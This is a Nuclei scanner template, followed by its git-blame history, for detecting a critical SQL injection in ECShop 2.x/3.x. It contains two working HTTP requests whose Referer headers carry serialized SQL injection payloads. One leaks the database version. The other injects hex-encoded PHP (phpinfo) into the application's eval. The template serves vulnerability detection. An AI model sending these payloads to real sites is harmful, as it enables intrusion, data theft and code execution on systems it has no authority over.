nuclei-templates/http/vulnerabilities/other/ecshop-sqli.yaml

id: ecshop-sqli

info:
  name: ECShop 2.x/3.x - SQL Injection
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: critical
  description: |
    ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
    - https://www.shutingrz.com/post/ad_hack-ec_exploit/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="ECShop"
  tags: sqli,php,ecshop

http:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and
# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`id: ecshop-sqli`

Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`info:`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`name: ECShop 2.x/3.x - SQL Injection`
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`author: Lark-lab,ImNightmaree,ritikchaddha`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`severity: critical`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`description: \|`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`reference:`
			`- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a`
			`- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html`
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`- http://www.wins21.com/mobile/blog/blog_view.html?num=1172`
Update ecshop-sqli.yaml 2022-05-18 09:36:50 +00:00			`- https://www.shutingrz.com/post/ad_hack-ec_exploit/`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
templateman update 2023-10-14 11:27:55 +00:00			`cvss-score: 10`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`cwe-id: CWE-89`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`fofa-query: app="ECShop"`
misc updates 2021-11-08 10:15:54 +00:00			`tags: sqli,php,ecshop`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`- raw:`
Update ecshop-sql.yaml 2021-11-07 02:36:28 +00:00			`- \|`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`GET /user.php?act=login HTTP/1.1`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Referer: 554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}`
Update ecshop-sqli.yaml 2023-12-21 07:30:00 +00:00
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`- \|`
			`GET /user.php?act=login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`Referer: 554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:107:"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/";}554fcae493e564ee0dc75bdf2ebf94ca`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`stop-at-first-match: true`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`matchers:`
			`- type: word`
			`words:`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`- '[error] =>'`
			`- '[0] => Array'`
			`- 'MySQL server error report:Array'`
Linting 2021-11-07 02:39:21 +00:00			`condition: and`
Auto Template Signing [Thu Dec 21 10:32:02 UTC 2023] :robot: 2023-12-21 10:32:03 +00:00			`# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950`